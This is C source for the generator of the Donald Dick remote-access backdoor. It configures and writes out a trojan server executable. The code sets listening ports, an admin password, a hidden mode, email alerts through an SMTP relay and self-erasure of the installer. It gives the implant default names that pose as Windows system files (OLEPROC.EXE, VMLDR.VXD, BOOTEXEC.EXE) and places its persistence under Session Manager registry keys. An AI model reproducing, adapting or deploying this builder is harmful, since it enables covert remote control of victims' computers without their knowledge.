#include <windows.h>
#include "md5.h"
#include "resource.h"
#include "registry.h"
#include "sm.h"
#include "stdlib.h"
#include "toolhelp.h"
#include "switches.h"


typedef struct zINIPAR {
  CHAR  *Name;
  CHAR  *Value;
} INIPAR;

INIPAR  Parms[] = {
             { "SPX_ports", NULL },
             { "TCP_ports", NULL },
             { "Password", NULL },
             { "Hidden", NULL },
             { "KeepPreviousSettings", NULL },
             { "MailTo", NULL },
             { "MailOnce", NULL },
             { "SMTP_relay", NULL },
             { "MailWhenServerCrash", NULL },
             { "MailHowManyLogRecords", NULL },
             { "ServerName", NULL },              // the order corresponds
             { "W9XServerName2", NULL },          // that one in resource
             { "WNTServerName2", NULL },
             { "W9XLoaderName", NULL },
             { "WNTLoaderName", NULL },
             { "W9XHomeKey", NULL },
             { "WNTHomeKey", NULL },
             { "ParamsVName", NULL },
             { "ChatVName", NULL },
             { "EventName", NULL },
             { "ACLName", NULL },
             { "EraseItself", NULL },
             { NULL, NULL }
        };

#define INI_BUF_SZ  16384

HANDLE  Fh, Ch, Lh;
char    Str[MAX_PATH+128];
char    FileName[ MAX_PATH ], IniFileName[ MAX_PATH ];
char*   cp;
DWORD   CfgDataSz;
BYTE    CfgData[ 8192 ];
char    IniBuffer[ INI_BUF_SZ ];
char    FNames[ 1024 ];

void Print( char* Str )
  {
    DWORD  w;

    WriteConsole( Ch, Str, lstrlen( Str ), &w, 0 );
    WriteFile( Lh, Str, lstrlen( Str ), &w, 0 );
  }

void BinaryToStrBuf( BYTE* Data, int Sz, char* Result )
  {
    int    i, j;
    BYTE   b;
    static char HexDigits[] = "0123456789ABCDEF";

    for( i = j = 0; i < Sz; i++ ) {
      b = Data[ i ];
      Result[ j++ ] = HexDigits[ (b >> 4) & 15 ];
      Result[ j++ ] = HexDigits[ b & 15 ];
    }
    Result[ j ] = '\0';
  }

void PrepareCfgData()
  {
    int    sA, sB, sL;
    DWORD  vd;
    BYTE   vb;
    char   PasswordBuf[33];
    MD5_CTX  MD5Ctx;

    RegInitRaw( CfgData, &CfgDataSz );

    if( Strchr( argv[0], '\\' ) == NULL ) {
     lstrcpy( IniFileName, ".\\" );
     lstrcat( IniFileName, argv[0] );
    }
    else
     lstrcpy( IniFileName, argv[0] );
    cp = Strrchr( IniFileName, '.' );
    if( cp == NULL ) cp = IniFileName + lstrlen( IniFileName );
    if( Strchr( cp, '\\' ) != NULL )  cp = IniFileName + lstrlen( IniFileName );
    lstrcpy( cp, ".ini" );
    wsprintf( Str, "Reading %s: ", IniFileName );
    Print( Str );

    sA = GetPrivateProfileSection( "Configuration",
                                     IniBuffer, INI_BUF_SZ, IniFileName );
    if( sA <= 0 ) {
      wsprintf( Str, "- error\r\n" );
      Print( Str );
    }
    else {
      for( sA = 0; (sL = lstrlen( &IniBuffer[ sA ] )) != 0; sA += sL + 1 ) {
        if( (cp = Strchr( &IniBuffer[ sA ], '=' )) != NULL ) {
          *cp = '\0';
          for( sB = 0; Parms[ sB ].Name != NULL; sB++ )
            if( lstrcmpi( &IniBuffer[ sA ], Parms[ sB ].Name ) == 0 ) {
              Parms[ sB ].Value = &IniBuffer[ sA +
                                         lstrlen( &IniBuffer[ sA ] ) + 1 ];
              break;
            }
        }
      }
      wsprintf( Str, "- ok\r\n" );
      Print( Str );
    }

    if( Parms[0].Value != NULL ) {
      wsprintf( Str, "SPX_ports = %s\r\n", Parms[0].Value );
      Print( Str );
      cp = Parms[0].Value;
      sL = lstrlen( Parms[0].Value );
      while( (cp = Strchr( cp, ',' )) != NULL ) { *cp = '\0'; cp++; }
      RegWriteParamRaw( CfgData, &CfgDataSz,
                        RVAL_PDATA0, Parms[0].Value, sL + 1 );
    }
    if( Parms[1].Value != NULL ) {
      wsprintf( Str, "TCP_ports = %s\r\n", Parms[1].Value );
      Print( Str );
      cp = Parms[1].Value;
      sL = lstrlen( Parms[1].Value );
      while( (cp = Strchr( cp, ',' )) != NULL ) { *cp = '\0'; cp++; }
      RegWriteParamRaw( CfgData, &CfgDataSz,
                        RVAL_PDATA1, Parms[1].Value, sL + 1 );
    }
    if( Parms[2].Value != NULL ) {
      wsprintf( Str, "Password = %s\r\n", Parms[2].Value );
      Print( Str );
      MD5Init( &MD5Ctx );
      MD5Update( &MD5Ctx, Parms[2].Value, lstrlen( Parms[2].Value ) );
      MD5Final( &MD5Ctx );
      BinaryToStrBuf( MD5Ctx.digest, 16, PasswordBuf );
      MD5Init( &MD5Ctx );
      MD5Update( &MD5Ctx, PasswordBuf, 32 );
      MD5Final( &MD5Ctx );
      RegWriteParamRaw( CfgData, &CfgDataSz,
                        RVAL_ADMIN_PASSWORD, MD5Ctx.digest, 16 );
    }
    if( Parms[3].Value != NULL ) {
      vb = (BYTE) Strtoul( Parms[3].Value, NULL, 0 );
      wsprintf( Str, "Hidden = %d\r\n", vb );
      Print( Str );
      RegWriteParamRaw( CfgData, &CfgDataSz, RVAL_HIDDEN_MODE, &vb, 1 );
    }
    if( Parms[4].Value != NULL ) {
      vd = Strtoul( Parms[4].Value, NULL, 0 );
      wsprintf( Str, "KeepPreviousSettings = %d\r\n", vd );
      Print( Str );
      RegWriteParamRaw( CfgData, &CfgDataSz, RVAL_KEEP_SETTINGS, &vd, 4 );
    }
    if( Parms[5].Value != NULL ) {
      wsprintf( Str, "MailTo = %s\r\n", Parms[5].Value );
      Print( Str );
      RegWriteParamRaw( CfgData, &CfgDataSz,
                        RVAL_MAIL_TO, Parms[5].Value,
                        lstrlen( Parms[5].Value ) + 1 );
    }
    if( Parms[6].Value != NULL ) {
      vb = (BYTE) Strtoul( Parms[6].Value, NULL, 0 );
      wsprintf( Str, "MailOnce = %d\r\n", vb );
      Print( Str );
      RegWriteParamRaw( CfgData, &CfgDataSz, RVAL_MAIL_ONCE, &vb, 1 );
    }
    if( Parms[7].Value != NULL ) {
      wsprintf( Str, "SMTP_relay = %s\r\n", Parms[7].Value );
      Print( Str );
      RegWriteParamRaw( CfgData, &CfgDataSz,
                        RVAL_SMTP, Parms[7].Value,
                        lstrlen( Parms[7].Value ) + 1 );
    }
    if( Parms[8].Value != NULL ) {
      vb = (BYTE) Strtoul( Parms[8].Value, NULL, 0 );
      wsprintf( Str, "MailWhenServerCrash = %d\r\n", vb );
      Print( Str );
      RegWriteParamRaw( CfgData, &CfgDataSz, RVAL_MAIL_ERRORS, &vb, 1 );
    }
    if( Parms[9].Value != NULL ) {
      vd = Strtoul( Parms[9].Value, NULL, 0 );
      wsprintf( Str, "MailHowManyLogRecords = %d\r\n", vd );
      Print( Str );
      RegWriteParamRaw( CfgData, &CfgDataSz, RVAL_LOG_RECORDS_MAIL, &vd, 4 );
    }
    if( Parms[21].Value != NULL ) {
      vd = Strtoul( Parms[21].Value, NULL, 0 );
      wsprintf( Str, "EraseInstaller = %d\r\n", vd );
      Print( Str );
      RegWriteParamRaw( CfgData, &CfgDataSz, RVAL_ERASE_INSTALLER, &vd, 4 );
    }

    wsprintf( Str, "Configuration data size %d bytes\r\n", CfgDataSz );
    Print( Str );

    if( Parms[10].Value == NULL ) {
      wsprintf( Str, "ServerName: default is assumed - OLEPROC.EXE\r\n" );
      Print( Str );
      Parms[10].Value = "OLEPROC.EXE";
    }
    else {
      wsprintf( Str, "ServerName = %s\r\n", Parms[10].Value );
      Print( Str );
    }
    if( Parms[11].Value == NULL ) {
      wsprintf( Str, "W9XServerName2: default is assumed - PNPMGR.PCI\r\n" );
      Print( Str );
      Parms[11].Value = "PNPMGR.PCI";
    }
    else {
      wsprintf( Str, "W9XServerName2 = %s\r\n", Parms[11].Value );
      Print( Str );
    }
    if( Parms[12].Value == NULL ) {
      wsprintf( Str, "WNTServerName2: default is assumed - PMSS.EXE\r\n" );
      Print( Str );
      Parms[12].Value = "PMSS.EXE";
    }
    else {
      wsprintf( Str, "WNTServerName2 = %s\r\n", Parms[12].Value );
      Print( Str );
    }
    if( Parms[13].Value == NULL ) {
      wsprintf( Str, "W9XLoaderName: default is assumed - VMLDR.VXD\r\n" );
      Print( Str );
      Parms[13].Value = "VMLDR.VXD";
    }
    else {
      wsprintf( Str, "W9XLoaderName = %s\r\n", Parms[13].Value );
      Print( Str );
    }
    if( Parms[14].Value == NULL ) {
      wsprintf( Str, "WNTLoaderName: default is assumed - BOOTEXEC.EXE\r\n" );
      Print( Str );
      Parms[14].Value = "BOOTEXEC.EXE";
    }
    else {
      wsprintf( Str, "WNTLoaderName = %s\r\n", Parms[14].Value );
      Print( Str );
    }
    if( Parms[15].Value == NULL ) {
      Parms[15].Value = "System\\CurrentControlSet\\Services\\VxD\\VMLDR";
      wsprintf( Str, "W9XHomeKey: default is assumed - %s\r\n", Parms[15].Value );
      Print( Str );
    }
    else {
      wsprintf( Str, "W9XHomeKey = %s\r\n", Parms[15].Value );
      Print( Str );
    }
    if( Parms[16].Value == NULL ) {
      Parms[16].Value = "System\\CurrentControlSet\\Control\\Session Manager";
      wsprintf( Str, "WNTHomeKey: default is assumed - %s\r\n", Parms[16].Value );
      Print( Str );
    }
    else {
      wsprintf( Str, "WNTHomeKey = %s\r\n", Parms[16].Value );
      Print( Str );
    }
    if( Parms[17].Value == NULL ) {
      wsprintf( Str, "ParamsVName: default is assumed - dpdata\r\n" );
      Print( Str );
      Parms[17].Value = "dpdata";
    }
    else {
      wsprintf( Str, "ParamsVName = %s\r\n", Parms[17].Value );
      Print( Str );
    }
    if( Parms[18].Value == NULL ) {
      wsprintf( Str, "ChatVName: default is assumed - ctdata\r\n" );
      Print( Str );
      Parms[18].Value = "ctdata";
    }
    else {
      wsprintf( Str, "ChatVName = %s\r\n", Parms[18].Value );
      Print( Str );
    }
    if( Parms[19].Value == NULL ) {
      wsprintf( Str, "EventName: default is assumed - FUCK666\r\n" );
      Print( Str );
      Parms[19].Value = "FUCK666";
    }
    else {
      wsprintf( Str, "EventName = %s\r\n", Parms[19].Value );
      Print( Str );
    }
    if( Parms[20].Value == NULL ) {
      wsprintf( Str, "ACLName: default is assumed - DXACL.DAT\r\n" );
      Print( Str );
      Parms[20].Value = "DXACL.DAT";
    }
    else {
      wsprintf( Str, "ACLName = %s\r\n", Parms[20].Value );
      Print( Str );
    }

    wsprintf( FNames, "%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n\r\n\r\n",
              Parms[10].Value, Parms[11].Value, Parms[12].Value,
              Parms[13].Value, Parms[14].Value, Parms[15].Value, Parms[16].Value,
              Parms[17].Value, Parms[18].Value, Parms[19].Value, Parms[20].Value );
  }

int DickMain()
  {
    IsWindowsNT();
    ToolhelpInit();
    AllocConsole();
    InitArgs();
    Ch = GetStdHandle( STD_OUTPUT_HANDLE );

    if( Strchr( argv[0], '\\' ) == NULL ) {
     lstrcpy( FileName, ".\\" );
     lstrcat( FileName, argv[0] );
    }
    else
     lstrcpy( FileName, argv[0] );
    cp = Strrchr( FileName, '.' );
    if( cp == NULL ) cp = FileName + lstrlen( FileName );
    if( Strchr( cp, '\\' ) != NULL )  cp = FileName + lstrlen( FileName );
    lstrcpy( cp, ".log" );
    Lh = CreateFile( FileName, GENERIC_READ | GENERIC_WRITE,
                     0, NULL, OPEN_ALWAYS, 0, NULL );
    SetEndOfFile( Lh );

    Print( "donald dick installable file generator; written by alexander yaworsky;\r\n\r\n" );

    PrepareCfgData();
    lstrcpy( FileName, argv[0] );
    cp = Strrchr( FileName, '\\' );
    if( cp == NULL ) cp = FileName;
    *cp = '\0';
    if( *FileName != '\0' &&
        cp[ lstrlen( cp ) - 1 ] != '\\' ) lstrcat( cp, "\\" );
    lstrcat( FileName, "ddick.exe" );
    wsprintf( Str, "Generating %s: ", FileName );
    Print( Str );
    Fh = CreateFile( FileName, GENERIC_READ | GENERIC_WRITE,
                     0, NULL, OPEN_ALWAYS, 0, NULL );
    if( Fh == INVALID_HANDLE_VALUE ) {
      wsprintf( Str, "cannot create file, error %d (%08X)\r\n",
                GetLastError(), GetLastError() );
      Print( Str );
    }
    else {
      SetEndOfFile( Fh );
      if( SM_MorphServer( Fh, IDF_DICK, FNames, CfgData, CfgDataSz ) ) {
        Print( "ok\r\n" );
        CloseHandle( Fh );
      }
      else {
        Print( "error\r\n" );
        CloseHandle( Fh );
        DeleteFile( FileName );
      }
    }
    CloseHandle( Ch );
    CloseHandle( Lh );
    FreeConsole();
    return 0;
  }
